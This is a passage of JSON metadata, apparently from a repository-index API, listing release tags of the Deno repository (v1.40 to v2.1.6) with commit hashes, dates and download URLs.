nd%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e